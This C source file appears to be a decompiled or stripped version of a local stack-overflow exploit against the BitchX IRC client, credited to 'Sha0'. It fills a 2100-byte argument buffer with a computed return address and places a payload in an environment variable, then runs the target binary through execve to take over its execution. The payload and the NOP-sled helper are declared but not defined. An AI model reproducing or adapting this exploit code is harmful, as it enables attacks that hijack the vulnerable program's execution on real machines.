
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buff ;


 int bzero (char*,int) ;
 int execve (char*,char**,char**) ;
 int fprintf (int ,char*,...) ;
 int free (char*) ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,char*,int) ;
 int nopea () ;
 char* payload ;
 int perror (char*) ;
 int stdout ;
 unsigned long strlen (char*) ;

int main (int argc, char **argv) {

 char *buff;
 char *arg1="bash";
 char *arg2="-c";
 char *arg[]={arg1,arg2,buff,((void*)0)};
 char *env[]={"TERM=xterm",payload,((void*)0)};
 char offset[]="";
 char sret[4];
 unsigned long lret;
 int i;

 if (argc != 2) {
  fprintf (stdout,"BitchX exploit Coded By Sha0\n");
  fprintf (stdout,"ej: %s /usr/bin/BitchX\n\n",argv[0]);
  return (1);
 }

 buff = (char *)malloc (2100);
 bzero (buff,sizeof(buff));
 arg[2] = buff;

 nopea ();

 lret = 0xbffffffa - strlen(payload) - strlen(argv[1]);
 sret[0] = (0x000000ff & lret);
 sret[1] = (0x0000ff00 & lret) >> 8;
 sret[2] = (0x00ff0000 & lret) >> 16;
 sret[3] = (0xff000000 & lret) >> 24;

 for (i=0;i<2088;i+=4)
  memcpy (buff+i,sret,4);

 execve (argv[1],arg,env);
 perror ("execve()");

 free (buff);
 return (0);
}
